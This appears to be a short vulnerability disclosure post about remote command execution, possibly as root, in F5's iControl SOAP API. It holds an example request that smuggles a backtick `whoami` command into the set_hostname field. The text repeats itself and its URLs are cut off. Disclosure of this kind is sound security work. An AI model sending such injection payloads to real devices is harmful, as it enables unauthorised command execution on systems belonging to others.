Linked below is an advisory regarding remote command execution (as root,
possibly) vulnerabilities within the iControl API:
http://support.f5.com/kb/en-
An example request that will set the hostname to 'root.example.com':
<?xml version="1.0" encoding="ISO-8859-1"?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://
<SOAP-ENV:Body>
<n1:set_hostname xmlns:n1="urn:iControl:System/
<hostname>`whoami`.example.com
</n1:set_hostname>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
This was responsibly disclosed to F5 on the 7th of February. If you
would like the full communication timeline, feel free to ask.
Brandon Perry
bperry.volatile@gmail.com
possibly) vulnerabilities within the iControl API:
http://support.f5.com/kb/en-
An example request that will set the hostname to 'root.example.com':
<?xml version="1.0" encoding="ISO-8859-1"?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://
<SOAP-ENV:Body>
<n1:set_hostname xmlns:n1="urn:iControl:System/
<hostname>`whoami`.example.com
</n1:set_hostname>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
This was responsibly disclosed to F5 on the 7th of February. If you
would like the full communication timeline, feel free to ask.
Brandon Perry
bperry.volatile@gmail.com